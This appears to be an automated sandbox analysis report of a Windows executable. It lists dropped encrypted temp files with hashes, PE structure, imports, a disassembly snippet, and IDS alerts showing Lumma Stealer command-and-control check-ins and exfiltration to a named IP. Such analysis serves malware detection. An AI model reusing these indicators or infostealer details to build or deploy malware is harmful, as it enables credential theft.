Preview:	Set Backing=O..SxjWaste-Ministries-..IgJWDaisy-Frankfurt-..VHFWide-Wisconsin-Than-When-Updated-Meets-Behind-Yea-Pod-..bshGKeno-Adjacent-One-Routers-..lkcRio-Titten-Pocket-..ihDjAlternatively-Shows-Missouri-Way-Healing-Elegant-..TDgSomething-Feeling-Pointer-Nearby-Teaching-Synopsis-Lamb-Elite-..YKNDCouncil-Amendment-Taxation-Flood-Ste-Highway-..lIShakespeare-Rug-..Set Request=I..RkMBGuaranteed-Hawaiian-..wAFy-Skilled-Increasingly-..mcJCourse-Valley-Bankruptcy-Lips-Inquiries-..JLYReservations-Apps-Entire-Contacts-Upper-Squirting-..sSzMan-Cattle-Cards-..ozSuImport-..Set Dozen=m..alTvRelaxation-Bobby-Compiled-Daniel-..GRiSWizard-Territories-Shirts-..dQuDelay-Prompt-..ufPeripheral-Attempts-Greatly-..yxhQueue-River-Hydraulic-Shadow-Keep-Aims-..RQUnder-Nowhere-Kit-Ata-Manuals-..mpjrRecording-Enrollment-Oliver-Siemens-Supplied-Modify-..ksenHilton-..epFastest-Boat-Borough-Hampton-Taiwan-..Set Saints=e..fSRPhone-Processed-..rwyEight-..WcAttract-Restoration-Mat-..FJLTransparent-Keywords-Temperatu

C:\Users\user\AppData\Local\Temp\Bow

Download File

Process:	C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe
File Type:	data
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	7.997501238446089
Encrypted:	true
SSDEEP:	1536:Q2KS9s787Xtx526OAPhIQlrPad5Rpwn5Dg9A:Q267875VOMT0m5Dgy
MD5:	08D32B1BCD848A0B1B2625828F39AB52
SHA1:	9DA30C2F0F66ACEC23E3BD0F38B7F0B44CB9A6D8
SHA-256:	51222FED5FCFFEBBE4FBAFC1A9A4C169B0B9AE8C2998164121A5463DEB550C99
SHA-512:	5988BC451F78EFFF13CA162A1F2AD527AE53C5A66129D267D88FEB0F5CD0F671FE1C5D5729CD9DD5543D45E7C8D964F8A33B10F3D4DCF53D41A83FE8C9F6C5E6
Malicious:	false
Preview:	.G.ra.r&..V.. ..?;..2....\|$s...~T...O....{..m.....8......Z.sKXI...tT.JI..z....H...L..Kb.6........R.1cy.;....J>.w.Q5>.P.......<4..h$.V.E}>..s..s.s..r.[.D..#.Jx.^.J.....I>h....n..Fc....T.....q...6g....Bm]t.....^E..g#y.=.W`..~8... ...Ce..b>=...q..qX:......doP_... ...G1..`=.<...$.'..$.'(.......X.A?..8....M.N...n"..R...9qI,}H..^.s._z.$e+!.S..\|.......@u...0/6.#..D..9C.m..........G..Q......l..l(Q...?$U..=S.6..\..7..K.....6o@.....\|c..[.M...@.y.rR.....L../....7..i..b......yH.{g.....ynQ.N/T)..o>{.!.!..".J..1.........F...[f...:..HqW.z.G.Z.V....E".z...HK.!..ye)2...!?..wm.`.,..g.<Aq...p. .2.._.b...4....y..4.R...!..Z...S2..f....[....[..6Q..<g...u4-.....l..,(Mr.OT.'llk.m... ....R.3.m....g>.T..o..V.yq.0..H....w....nY..d.......g..Z..w..[s...j.<7.tO^...ov..R#.B..l^g.....6).@..e.F&.8....2l.......G..%.m16..;s.....H[H,(W.L..".-).b...#.....<....u0.....9.j.L.o._..2.X8r2.8....s.)Wq.y...<..S...AY....._..JV.X.v........la....m..>H5...<...O.....B.a..W....?.

C:\Users\user\AppData\Local\Temp\Hit

Download File

Process:	C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe
File Type:	data
Category:	dropped
Size (bytes):	888330
Entropy (8bit):	6.622324214444162
Encrypted:	false
SSDEEP:	12288:6V0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:oxz1JMyyzlohMf1tN70aw8501
MD5:	1DFD0AD7FC5E451721D3F9C9EF13903D
SHA1:	33EB4B2C5674FAE8C43752A7EA2F41B47BED84DE
SHA-256:	9ED704DCFA4365319BDAE1A3595DB6124FE5764A4BD18B63C1ECA8BA8E48ABE5
SHA-512:	BE8EC0CC00B7B30F58D852A17EEB2AB9E503B281E5CA3388B3CF6A701008078F4AB1A854CC5FCE551FDEA69B5881EC7CF858363E564B80EC7F002B2DA00371B1
Malicious:	false
Preview:	.E.VW3........F.98u[.F..E.=......%....~..E...7.......t..E..D...E..D...G._.F.^]....}..t..M.......}..t.M........0.U..M..E......P.....uaSVW.}.3.S.5.xL..u,.7.u(.u$.u .u.Q.u..u.P.. .I.....t$8]4t.Sj.....I.Pj0V....I.9..........._..^[].0.%.....U...8SV.u.W.~:...m....].........E.E.P.6..4.I..M.E.VD.~H.M..E..U..}.....d.......s............}....E.P.3....I..E.M.+..U.E.E.+.E.E.P.6.U..M...p.I..}....E..u.M..}.f..........E...}.f.......E...E...}.f.......E...E...}.f......f..............t(.E.f.........u..........E..+...;............t'.E.f........`u..........E..+...;........U......................... ..R.....@..U..._^[..]....}.f.FX.......f......f.F\f......t_f.F`f......f.Fdf.......E.P.7..4.I....9^Xt=9^\tE.E.P.7....I.9^`......9^d...............{.......}..t..f.E.f.......f.E.f.......U..wL..M..........E....t..AX.E....t..A\.E...~..A`.E...~..Ad]...U..Q..xL.V.u.Wj.....8W................4xL.j.Z.U.;........$xL.....0.........F.;G.............................................}...VW.....~d...

C:\Users\user\AppData\Local\Temp\Intimate

Download File

Process:	C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe
File Type:	data
Category:	dropped
Size (bytes):	96256
Entropy (8bit):	7.998077159343571
Encrypted:	true
SSDEEP:	1536:eWb05gC49GvrPkJ4OFz3RbdwhY6WrQrVrUKmUxfuAw+xsRXWmiK6mPU9KPIq013m:eW45ggvr8Vt3oRoUxG6SRXWZK6J9OIbc
MD5:	2AFB5C41645505DF68921F3C23AE8C35
SHA1:	E661E4AA9B9641D7288D775A160F8B1CCEFCF2D7
SHA-256:	3FDFE481B2BCD2CBF93AC860FEAC83D810B3FFCA5C5869F5C10DA989DD7EED36
SHA-512:	9D4C045EFEA0BBCE6508A98539CC2ED0B0BCD6ADDFDA9D986A3433C7CE2BA8DBCA5D5C8A12FBE3AB27EFD191FD048E5D1F174034B21175C40320439716F5A885
Malicious:	false
Preview:	....#..O.AUiy....s.\.F..i...8NCj1..U.No.{.xi.>R7...Y~.A....A....2./...3J}....^0....l........8...V.y.. .....O.QC.'.3e...m^....%6..89.q3)...@{.f..3A..k.9g.}.........@.g.....J.DY..DP....+r...cF'....k..X.i.s5.r..\|(.....YR...R..........Ui.%{l..d...../.T.......hY.....n..Z.`...`P..>.(.+N....k.>.T.gbW.B....~.7.5;......<k.."..+...)..MP..\|-...q..nE...."&M.{=1...zvl........Q.pgA....\|.....+..{...n;9.[..(N..F..FA7N.1:....N..2.f..K[.)Q.G=Rb.TY..U.....fy#Y.Y..Et.v..'......w..q..P..m.C....f4..C....].D....C7..YI/....b.....:..AXj.!..........).."........3}V.&....%l..py...a....C.2..(.......K..%..L.v.t...z..`[LS..x#P...PUn.......o.BA^.5..NB]..I...?.$.0[..E......W0.....A...4.E.Zo..A&.OD..._..J.....''....].Q...Xj.5+....E..K.b..B..q..%..pu.X./....'...0.Aqj...`.%.q.JZ..S=..}.x*....dE..Q..z..^ .P....7.WD.c..\|....@\.f?...t...a..mY.IwI......LrTp=.Y...T\|.c.!na=.d.U...q.@-QF.q.....~.{.4........j0n.d.f@...\|..../.,}.......z$.......Z..J...>.<.F.y..W.U..Q.'5@.Q.....~.

C:\Users\user\AppData\Local\Temp\Olympics

Download File

Process:	C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe
File Type:	data
Category:	dropped
Size (bytes):	81920
Entropy (8bit):	7.997857600915691
Encrypted:	true
SSDEEP:	1536:THpFTyXDM1L//jOouym+YNP51IOVdw8td+9qMIH5fgaZwgU7QGm5o:VFttXiam+YpIOVC8tsqr5fZwgXG
MD5:	2150C3E426A3F08E684A503CC741371F
SHA1:	24A47A05C86A89F1D23262215DE93D4CB40AACE2
SHA-256:	F49C0B653C93EB4C718236327891A88AE6E18379AD0E62A8B275B9582D50D317
SHA-512:	88E3CD2065D5325F0C43C17D4A10F78827849E24D975D8A7866751B740D8B66FC2EBC0DF77E9B4E59F82D061FF4205B6F1C8789ADFFEC48986DA1566BF27A043
Malicious:	false
Preview:	o..y.b.+y........;..Z...Lb.x,.{>...8;.?."'*..#..Q....^JX......#....d.....Y.../......V....,.J.f ..HE3..../.\|./SvcC-.0.N..A.g."..?.=...GEk]..'..2d.z..{..:....+....vM.mG.t...?E.#...rG....vF....q.%\{....I..x....!d.\UVo..k..T...%..44.2.}KT_.r=..........J....P...R#{+.CRgF\|.u[.....I....\......j...:F.V{......../.K.......O3...p.=.....3.V.....#.pF.a@U.....\I...B#..Z.g....lLsd...?5G..7R.f.V1.KP....x.5.;qm..i\|dg.7A.....Vsp6..[...K?G.3H....p.....v.e. .N0GR..:..Xc....Ju......9...,......M....:C............%m/....7R....U..8...%..L1!.{..r....3~.0...6......CX....8(......W...tcb....4.;)4.h...+........>.b.P.]......uD......M. /.w.R2...N.w..~......J..}.......z?...G...6J....0.+.6..Bk.e.c..f........k`.s.%...7.%..a.2Iq......4..{...\...&q....P..[4.....z.-]..k vuHB.9.......<.^....B(;..R.Bu.4....RT.....r.....Q.w.PO.f.]....w...^..n._p.+.5/.$q.....~.JI.U>......C..8.\.w..C.'.R%.N=..)....4 .V..e5.........Z........!i.J..0U.bIk.!Z.I...J.....82...".I:.X6.p.!.H......$

C:\Users\user\AppData\Local\Temp\Relevance

Download File

Process:	C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe
File Type:	data
Category:	dropped
Size (bytes):	19174
Entropy (8bit):	7.989783706310729
Encrypted:	false
SSDEEP:	384:FjdI3AtbprWEDsXVkb24aq3MZ7TT5I0Iyn5iu2P8e1tc7:NdIgbpqQU+J3MF/IHc7
MD5:	89810FC4757D5B5C781A9DE57C0E22C4
SHA1:	D5447688547BB1D4FD06D72E02A3722FAA2837F9
SHA-256:	B44D6AF4017E43C9E6826EC2E67D55AA8BFD4FF6CD9216136286DBD1661CB82F
SHA-512:	3D75AEC54274F788200E16D39673B486EB936A433FB36543D3DAC38229EC2C6BEA6AF1FB1EFD373C7B00A41B8036D6CAE389836F68F685DCC23C5084E51D4ECC
Malicious:	false
Preview:	a.=.,.!...\...?qo...fQ..](W.@E:bg76w.ebw>.}.^....q^...?.#be._.e..Ji.......E....f..b.C.1...!....Q.8........y./k3.4G![.i.H....#.........../.%.....JMt...?.@...7Bf...#.i..x,../._...v...H....u.}.y......-gua-o.....Y.w.ah-.%..E.<..e.f...M.#..j..Hs.&.#..h.S.t.}.........v"Nf........;..J...=W.b.....G...........^.+1.[a{.z......B..me.Q....8..3rt..4....iZ.....w.I@......m.Ks..?.\......$..0a\O@YJ...d#.T(.u.V...'..l.....QS.......[9T.-5.As..s.....x..M....K.W..QU#Uf+._...<.....b....gT..g.c^.....1.3B9"./.Ez..T.}9....@..G....6F....R?V....n...'..c.'..j .l.....X...9..s....t9.......;p...Rv.H.......j?.....B..\|.J..L>n...}..@S..Z...\g......._u...T.!....Zg]..T.O.......c).7.<......T.~.Gp.N.;.u.z....uV.......1c....D.........lr....2...L.....X..:.5......L_m.I.~./...\|.E...........=.c.....z....b[./R.NM.H+..K..j.{5.:.J.r.zW.@/..E.6....2........P.$=2...D...../A>.......9........{.qe..u....\|..`.....3...mq(T.....`+...}..C.gt.hw3.qc.fP..... A..@.j....q......4..cV3.x.....D...

C:\Users\user\AppData\Local\Temp\Significant

Download File

Process:	C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe
File Type:	data
Category:	dropped
Size (bytes):	96256
Entropy (8bit):	7.998145523669775
Encrypted:	true
SSDEEP:	1536:a8m5UDHjgjwCbyH2USXAhPmg6/sxCie0N/SYKFCSyo/XFsb9fECoyZV6Rf67Gqh:a8wAD+mJ6sucxCaN/NzSyo/VM9fowChg
MD5:	1F0A8ABF3805100ECC54B383AEC67A6F
SHA1:	806E15F30C920C59EE73119FC7C674BEE0EC9A31
SHA-256:	2F85EB2B33DE38DCF3F8C75076BED5E82C6D462B649AE83D7F07289C931EBE87
SHA-512:	A246C6C6FCE36118566C4F53C337714AE864E4E02F924B02A1BB0471E05012993FA8BEE930E5B648C6B85612CC39343F97CA2870B339FB30ED5968D158FC3E04
Malicious:	false
Preview:	.4.o...,>...wE.......#'..<I..h....c.J).<.I.)x.0..<.!.G..j.....y....K.....7.Mx.n...UGp1...G.q..v.D3..a.,...x.,.U.E.2C.{..6...grtA..).MW.oC6..........39...WP@E..[6.(]....Pn..hq./..{h.._nb.....n...vc...A.3.Z.2..j.... ^._'......Q..sD._9R...\0..........f..,.1;Z.Ne....L.{.\|....O...<z........j........v1.9.m.....j.Et..../.....Ne.4m....HM.G.0..0"S;.Wm..........#.n..qW.&..K.I.g.....$.#.R.is....e.xA.4ZF.+..]I0]W,\.3k...uL..5..>5.....a._.......U#.....7....s..9...N.\.`.N.....x..f;..N$..j....I.U...Y.!..?...#V...0.8.....8\VW../.RK_.m&,..g..U.c..0..V...?..).e..,..ZHV.W..Q....;..fi(.lR..hgzc...).W.e.n+F...{$...~b....(....P....zD......={.D...E..&......~..<8..Y)s..h....Cu]S..>.t......{.......r..X......c<.+.n1.dk.A..........r.uD.<}T...:.\|Pg.q..fb1e.g+...(...I......S......U...<...[).QO....Gi.X..M7O..&.I.Q.6m.\....U..tF4*...[.mk.>.5......=..flY..e..\.R........o..v..]...p...N(.....c.<59.....W>.z.........&\i5F...d....A_)g......A....D..._...g...X.G9o.............

C:\Users\user\AppData\Local\Temp\Suzuki

Download File

Process:	C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe
File Type:	data
Category:	dropped
Size (bytes):	76800
Entropy (8bit):	7.997661840148746
Encrypted:	true
SSDEEP:	1536:+ZclXcRVacKEOXyA14aomcQ9aMfFhlmU4fuAoO70GBdCCAAx8J6VX:VpEVacKyA14aVcaBfFhlmI4CAx88
MD5:	ADA4E471B1669F0045B4411E8C51406D
SHA1:	E048A12E42B5DE1792DA4BE2851A0DE79DC9529B
SHA-256:	F9514C7588EFA8C29BF16C169DDFC5CEE06708CA0162AD546F8CFAB789621EF3
SHA-512:	6BD25C4ABA0C5248211E249807E1862C91E29F95A2161C5160E3A000B471E29269C745A334101CBEEFA28C8245EA6B7AC53C37A58875E5016187467D1169DB72
Malicious:	false
Preview:	.Cg.9(..-..{..3p.j].^.V\|....M...\|I...J.{.d....!..".~8..y..~K....t7..8._..5P]..8..Y..u....."...<X..@...'.3.,./......'...2.v+..:.../..O..A...R..GK.j..7z#...{j.i.PJ...i...L.9.ub.........>e.......{...uVj...gb...7....q..e...Sd.P.......w1.&gLa.-l..2..V.Z..t..o..x.B....1...?.`".:....GE.....D.\|2.....]..}..]...Y.r.;.lH:....8..Y.{E...)..VU.+............/.{.?....w..........!l....)..H=.L5R>..I!.2..#s....5..M.?..)........M......Q.$..`V..k.Tu....d..n..]8.....1?oa.2.`.U.#v..s.G.PBT.^..D..^..&... .k....S..5.}..'v\...(.....d...>]....]Q.\|..s#...Ol.-....7.....Pjz.m..6..6,...kq..O3.@yMM..f.6x.Lwm...............<X..!2..(.....^j.QK$.....*zH.6.Q\.i........A.K.+L..vC..m..x........ .....,7..q......).\|..........5.@.r.....G.F...N.>z..c.?.<W....j.d=4D<\|q6e..,...\.T.`.!w..=(2.4T.h......f}...z...}.]....a..E...4?..n....U...+W....ef..F.....[.Q.t.Y..g.....D........+.h-.o...&....B..........;]..].oS.N.......:lx.rq.....".h...g.1!.G..>..`.4.C!.T........ew.xt.F....

C:\Users\user\AppData\Local\Temp\Tobago

Download File

Process:	C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe
File Type:	data
Category:	dropped
Size (bytes):	61440
Entropy (8bit):	7.996515870395876
Encrypted:	true
SSDEEP:	1536:ocDsDbO3F0qddpEQixpyxDDFTlMtuG6TBPPdMBUOFsCH:lsPOVNTOQii1BlIGPCBZlH
MD5:	A69E1AD271E4D67AD0E89903C0C1A3AE
SHA1:	381AC59AB8F91A2A0641C0AEB7D44C5C4BEBF7B9
SHA-256:	CE79928E0DECC37242244977007B7BBB65209E38500F994EF778B090571BDEE5
SHA-512:	BB5CFB019A88F7F7771E5B987826159F9799D26DD66EF5328756BA92904050DAEED06AE350132C6745290A69E73BF49AAD63ECEA5E1CB1E2143C44D97D82206D
Malicious:	false
Preview:	.........[h$\.Y..&3...@U#.<...B.H.:..rW\:..NIH......$....m...>...B._E.-..S.!_yEp.....L....x!..[.+..Ma...v....x8...dk..mD=........v.L]t5.../.2....h6Q../"..H.gh.6n.......d.V.pr..!...}.....4.`.T...4.t..F....>/...W..1...D.~Fx}..%o....6..*....Y.z.H.......W..qh........n..&...fj.....(...2.}[8.}.'....2o.v..8.`.=....Lu;f.h......~.s.[......`.....{....j.U^\.XXS>(j{&....H.FXNJ ..,._..F9...\|X.....Bgf5....x...@B..,..-.:},%../....\JL...].Z.W.f...}[m..E.+.2.eO..V.Ya....2>. ....(.1\..s.{....O....yf..B.......].Nk.p..q..!e#>..\.F.1g..z....9.......F....S.....h,...e..$w..7.t.{&q$...B^4Fs2.V.yZR..!.....9@...d..W.0.>..g.\..."..V..r.9.....om.g`q.Iy\|.w..G......{^.!..Z.aX..b...NI..HC.....k..3zL..w"..@@.D..I.....^.@....2m...$!/.0....M..}...-....b..v..bN. .~......vZ?....7.#pb.&..]..S.t..:.....F....f....X..w......DXjd'q..................Sd.&..Sr...H....)..QU.T..Hw....w.=.n...@mIg...9r.gc<..Y10.f...$...W4.I......BI=W..K.xB......)...d2....{.........}.^..w.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.977879564017972
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Okfjk1hs4kdhs2.exe
File size:	1'057'550 bytes
MD5:	68a5a9e169248c593aa8080e6172bf86
SHA1:	d4f93a9c039fcff9651ff11906ecf3a70199beec
SHA256:	19c683016b8171a4bdb6c987b2045307289656d2c555d08f14ef6c342dca0ea0
SHA512:	4a8726cefaf8a82a0290eda2b37026264c21d8eb01e1e72900a553742b2fb3317b6c4cb1174039f1ada11466d84730cc9a15a9d7fcf397ed7bba34f465b4f673
SSDEEP:	24576:Xm1UXgonZRHfxbLLRSbp9yu4FcuUrpjyRPwq1:2Yl7HfvIp9ynnUrICq
TLSH:	802523975D9898B3F9918DFA35E0C5170EF3FE17862AD86E0345DC6CB563202C1ADB22
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n...8...B...8.....

File Icon


Icon Hash:	0ff1eebeeef82b0f

Static PE Info

General

Entrypoint:	0x403883
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 00409268h
mov dword ptr [esp+14h], ebp
call dword ptr [00408030h]
push 00008001h
call dword ptr [004080B4h]
push ebp
call dword ptr [004082C0h]
push 00000008h
mov dword ptr [00472EB8h], eax
call 00007F3CD10223DBh
push ebp
push 000002B4h
mov dword ptr [00472DD0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 00409264h
call dword ptr [00408184h]
push 0040924Ch
push 0046ADC0h
call 00007F3CD10220BDh
call dword ptr [004080B0h]
push eax
mov edi, 004C30A0h
push edi
call 00007F3CD10220ABh
push ebp
call dword ptr [00408134h]
cmp word ptr [004C30A0h], 0022h
mov dword ptr [00472DD8h], eax
mov eax, edi
jne 00007F3CD101F9AAh
push 00000022h
pop esi
mov eax, 004C30A2h
push esi
push eax
call 00007F3CD1021D81h
push eax
call dword ptr [00408260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007F3CD101FA33h
push 00000020h
pop ebx
cmp ax, bx
jne 00007F3CD101F9AAh
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9b34	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf4000	0x175aa	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xe9dce	0x1b40	.ndata
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7a000	0x964	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6dae	0x6e00	00499a6f70259150109c809d6aa0e6ed	False	0.6611150568181818	data	6.508529563136936	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x2a62	0x2c00	07990aaa54c3bc638bb87a87f3fb13e3	False	0.3526278409090909	data	4.390535020989255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x67ebc	0x200	014871d9a00f0e0c8c2a7cd25606c453	False	0.203125	data	1.4308602597540492	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x73000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xf4000	0x175aa	0x17600	48b5f68c22e2bd97cbcfec77121c5f5a	False	0.9714133522727273	data	7.841157820369727	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x10c000	0xf32	0x1000	823b756df5c16500dd2aa09b00a9b170	False	0.58984375	data	5.414691347469535	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xf4208	0x14974	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9811714488973203
RT_ICON	0x108b7c	0x2308	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.0012265834076717
RT_DIALOG	0x10ae84	0x100	data	English	United States	0.5234375
RT_DIALOG	0x10af84	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x10b0a0	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x10b100	0x22	Targa image data - Map 32 x 18804 x 1 +1	English	United States	0.9411764705882353
RT_VERSION	0x10b124	0x1b0	data	English	United States	0.5648148148148148
RT_MANIFEST	0x10b2d4	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-28T14:07:55.011281+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49901	104.21.9.13	443	TCP
2024-10-28T14:07:55.011281+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49901	104.21.9.13	443	TCP
2024-10-28T14:07:56.227768+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49911	104.21.9.13	443	TCP
2024-10-28T14:07:56.227768+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49911	104.21.9.13	443	TCP
2024-10-28T14:08:01.810652+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49946	104.21.9.13	443	TCP
2024-10-28T14:08:05.859421+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49969	104.21.9.13	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 28, 2024 14:07:53.792488098 CET	49901	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:53.792548895 CET	443	49901	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:53.792666912 CET	49901	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:53.793693066 CET	49901	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:53.793714046 CET	443	49901	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:54.440157890 CET	443	49901	104.21.9.13	192.168.2.5
